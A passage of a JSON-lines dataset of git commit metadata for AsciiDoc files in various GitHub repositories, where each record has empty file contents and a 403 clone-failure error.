ehoux\/camel,CodeSmell\/camel,akhettar\/camel,pkletsko\/camel,drsquidop\/camel,dmvolod\/camel,cunningt\/camel,NickCis\/camel,alvinkwekel\/camel,nboukhed\/camel,allancth\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,pkletsko\/camel,tadayosi\/camel,akhettar\/camel,curso007\/camel,Thopap\/camel,christophd\/camel,curso007\/camel,DariusX\/camel,lburgazzoli\/camel,DariusX\/camel,gautric\/camel,snurmine\/camel,curso007\/camel,dmvolod\/camel,cunningt\/camel,Thopap\/camel,drsquidop\/camel,allancth\/camel,pax95\/camel,CodeSmell\/camel,mgyongyosi\/camel,curso007\/camel,objectiser\/camel,acartapanis\/camel,acartapanis\/camel,gautric\/camel,pax95\/camel,nicolaferraro\/camel,Fabryprog\/camel,ullgren\/camel,pax95\/camel,anton-k11\/camel,prashant2402\/camel,gautric\/camel,driseley\/camel,mgyongyosi\/camel,nboukhed\/camel,scranton\/camel,pmoerenhout\/camel,isavin\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,yuruki\/camel,jamesnetherton\/camel,cunningt\/camel,davidkarlsen\/camel,tlehoux\/camel,onders86\/camel,jonmcewen\/camel,jkorab\/camel,pax95\/camel,lburgazzoli\/camel,mcollovati\/camel,rmarting\/camel,snurmine\/camel,jkorab\/camel,allancth\/camel,christophd\/camel,lburgazzoli\/apache-camel","old_file":"components\/camel-azure\/src\/main\/docs\/azure-queue-component.adoc","new_file":"components\/camel-azure\/src\/main\/docs\/azure-queue-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d189641b2fb5a44fcf4b0ab1b2470d0614eae266","subject":"y2b create post South Park: The Stick of Truth Grand Wizard Edition Unboxing","message":"y2b create post South Park: The Stick of Truth Grand Wizard Edition 
Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-05-South-Park-The-Stick-of-Truth-Grand-Wizard-Edition-Unboxing.adoc","new_file":"_posts\/2014-03-05-South-Park-The-Stick-of-Truth-Grand-Wizard-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e1d37f872761b87ce156d73deda350d453e1d5","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"asciidoctor\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ysb33r\/asciidoctor-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5cbd1203db5c7f1735714514655ec2860995894","subject":"Update 2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","message":"Update 2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","new_file":"_posts\/2017-01-05-Exploring-alternative-neural-computational-models-continued.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91bc213b6426a1dbbd1e7b216df65ce83c62c6a6","subject":"Update 2015-08-27-Why-am-I-here.adoc","message":"Update 2015-08-27-Why-am-I-here.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-27-Why-am-I-here.adoc","new_file":"_posts\/2015-08-27-Why-am-I-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"738c8bfc7936776872832cbddab6fc12d4a709b7","subject":"Update 2017-03-14-MMM-delicious.adoc","message":"Update 2017-03-14-MMM-delicious.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-03-14-MMM-delicious.adoc","new_file":"_posts\/2017-03-14-MMM-delicious.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07517b6afc88046231df83fae86e62b1b32eb4f7","subject":"Update 2018-01-20-Bitrise-de-ci.adoc","message":"Update 
2018-01-20-Bitrise-de-ci.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_file":"_posts\/2018-01-20-Bitrise-de-ci.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"052935b3840223ec7aa6129a035b71758f6d5e2d","subject":"Update 2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","message":"Update 2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_file":"_posts\/2015-08-29-Railroads-Silicon-and-Tigers-My-Asian-American-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af0e8487f4fbd711c66f59ca6dc513c9b42c55e","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3da60a56e4ea841f63e61b93d600b1e58bb3c454","subject":"Update 2018-01-01-Test-Post.adoc","message":"Update 2018-01-01-Test-Post.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2018-01-01-Test-Post.adoc","new_file":"_posts\/2018-01-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d16dcf80b065d81dd4d43aafc667d52442fb657","subject":"Update 2015-03-01-Hello-world.adoc","message":"Update 2015-03-01-Hello-world.adoc","repos":"frenchduff\/frenchduff.github.io,frenchduff\/frenchduff.github.io,frenchduff\/frenchduff.github.io","old_file":"_posts\/2015-03-01-Hello-world.adoc","new_file":"_posts\/2015-03-01-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frenchduff\/frenchduff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad6ac778a8f4eeccc6d7884dce8706303ba6253","subject":"Update 2016-08-29-Hello-world.adoc","message":"Update 
2016-08-29-Hello-world.adoc","repos":"fbruch\/fbruch.github.com,fbruch\/fbruch.github.com,fbruch\/fbruch.github.com,fbruch\/fbruch.github.com","old_file":"_posts\/2016-08-29-Hello-world.adoc","new_file":"_posts\/2016-08-29-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbruch\/fbruch.github.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b74c8e49097b4a76915e32c01f6bb54f9d73afb","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ff07c123dfed8da287b57f1453366c9e1204685","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c1153f967bd1352e49c5a689e220575a871593a","subject":"Readme for ext projects","message":"Readme for ext projects","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"ext\/README.adoc","new_file":"ext\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"368c2643cb6f043e87e7bd91aa82568e9f3995d7","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0e8d0f8fe94521a9d6fa6efdbc88d5dd221e47a","subject":"y2b create post PS4 vs Xbox One Showdown [#1] (The Controllers)","message":"y2b create post PS4 vs Xbox One Showdown [#1] (The 
Controllers)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-28-PS4-vs-Xbox-One-Showdown-1-The-Controllers.adoc","new_file":"_posts\/2013-12-28-PS4-vs-Xbox-One-Showdown-1-The-Controllers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baed3925d97da0e5e11599299dafa6be8700cd4c","subject":"Update readme","message":"Update readme\n","repos":"systemd-commander\/systemd-commander","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/systemd-commander\/systemd-commander.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"73f149fbddd2ede488770678dbc9daae66c92fd3","subject":"link doc as readme","message":"link doc as readme\n","repos":"getreu\/asciiart-hangman-for-kids.rs,getreu\/asciiart-hangman-for-kids.rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciiart-hangman-for-kids.rs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c0a8d6075ee03470e9950e0d7e0b44c420f43d","subject":"Update doc to reflect C* 2.2 dependency","message":"Update doc to reflect C* 2.2 dependency\n","repos":"mwringe\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,spadgett\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,spadgett\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,hawkular\/hawkular-metrics","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57115c1ae785f3791589cfd844e1c3fd9efaf911","subject":"Add origin and work with clone information","message":"Add origin and work with clone information\n\nSigned-off-by: Stephan Linz <0c883f969082385953c36ae90fd905b7f154694b@li-pro.net>\n","repos":"lipro-yocto\/git-repo,lipro-yocto\/git-repo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lipro-yocto\/git-repo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da1e5f93a3bcf730fe15a3c9a63a407163aba81a","subject":"Add README.adoc","message":"Add 
README.adoc\n","repos":"tatsuya6502\/bhyve-scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tatsuya6502\/bhyve-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"328b0b081d404c8bb72e23e9833ae12eb07e1fa1","subject":"Problem: users don't know what OS dependencies are needed","message":"Problem: users don't know what OS dependencies are needed\n\nSolution: add \"openssl gcc pkgconfig libudev\" to the readme\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f0394c32c11f58cf62642ba4857abd1fd77975e","subject":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","message":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1d1b1decaf9e5581dae807cbf08927b87ef005","subject":"Update 2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","message":"Update 2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","new_file":"_posts\/2017-07-04-Open-source-is-the-most-important-motor-for-innovation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4336d02d3519e1cf7d7e6c241854d2fe2dabb4","subject":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","message":"Update 2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_file":"_posts\/2017-01-01-Create-custom-visualisations-in-Microstrategy-with-d3js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fc8e65ad65dab1e87d9b5ed845bb9891adfa670","subject":"Added CIP2018-10-29 EXISTS and IS NOT NULL","message":"Added CIP2018-10-29 EXISTS and IS NOT 
NULL\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2018-10-29-EXISTS-and-IS-NOT-NULL.adoc","new_file":"cip\/1.accepted\/CIP2018-10-29-EXISTS-and-IS-NOT-NULL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7840a3d1c37c98368f3f4a41583d02a3e30e530c","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cad194fc183dcf75e9893ca1db857b8a980551c9","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/03\/20\/deref.adoc","new_file":"content\/news\/2022\/03\/20\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"388c6da4e20c92ba30e0871b368c66a853b2b2ad","subject":"y2b create post What is the best RAM for a Mac? (MacBook Pro, iMac, Mac Mini)","message":"y2b create post What is the best RAM for a Mac? (MacBook Pro, iMac, Mac Mini)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-11-What-is-the-best-RAM-for-a-Mac-MacBook-Pro-iMac-Mac-Mini.adoc","new_file":"_posts\/2012-02-11-What-is-the-best-RAM-for-a-Mac-MacBook-Pro-iMac-Mac-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dcfce94f1d783a905f1c1e98f63116b363b350f","subject":"Update 2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","message":"Update 2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","repos":"sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io,sskorol\/sskorol.github.io","old_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_file":"_posts\/2016-07-18-Tracking-functional-tests-network-statistics-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sskorol\/sskorol.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5f964c6f96077cd5657f77390465ecc06183a98","subject":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","message":"Update 
2017-05-29-Fortigate-Policy-Routing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03ef74c60ff52a25881079919068f405d2571662","subject":"Naming pck","message":"Naming pck\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"916605a44e3ef01a5637788b9f5bfad4da04e754","subject":"y2b create post The New iPod Nano Watch Faces (iWatchz Carbon Unboxing \\u0026 Review)","message":"y2b create post The New iPod Nano Watch Faces (iWatchz Carbon Unboxing \\u0026 Review)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-07-The-New-iPod-Nano-Watch-Faces-iWatchz-Carbon-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-10-07-The-New-iPod-Nano-Watch-Faces-iWatchz-Carbon-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0e5e7efc77ec5b3dce06618e198cb3a75112fc4","subject":"Initial addition of CustomBuild and local STI testing","message":"Initial addition of CustomBuild and local STI testing\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"image_writers_guide\/sti_testing.adoc","new_file":"image_writers_guide\/sti_testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f84800b67294b3a38f6e7081a53b7faa2bacf22","subject":"details","message":"details\n","repos":"codezork\/BlueNodes,codezork\/BlueNodes","old_file":"docs\/details.adoc","new_file":"docs\/details.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codezork\/BlueNodes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"398d00cc262b18b7a093ab95033c57be6d3b9b36","subject":"2016-07-13-narcissm.adoc","message":"2016-07-13-narcissm.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-13-narcissm.adoc","new_file":"_posts\/2016-07-13-narcissm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"6d99bcca2460449204af83508c8fc2d017723ceb","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5708520145522c1eeeeccf0f9f1f3b4ed18dae2","subject":"Quick Start tutorial to parse your first data source","message":"Quick Start tutorial to parse your first data source\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/quick-start.asciidoc","new_file":"docs\/quick-start.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"bb36fae7aa573281d78c1327750a15e22f582732","subject":"ASDF quick start","message":"ASDF quick start\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1c01864a4dc34d9980580c33c2e0b8e932aeeb81","subject":"Update 2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","message":"Update 2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","new_file":"_posts\/2015-06-10-Grails-Rodando-duas-aplicacoes-na-mesma-instancia-do-Tomcat-em-subdominios-diferentes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98574a9e1af021141b47ad23a313d3d7e38f3649","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-raml-console,gravitee-io\/gravitee-raml-console","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-raml-console.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"070a957d3461a62b2e30a4465186e882d46a8481","subject":"Update 2016-10-08-Elektron-Analog-Rytm-Arturia-DrumBrute-Tom-Cat-Feature-Comparison-Chart.adoc","message":"Update 
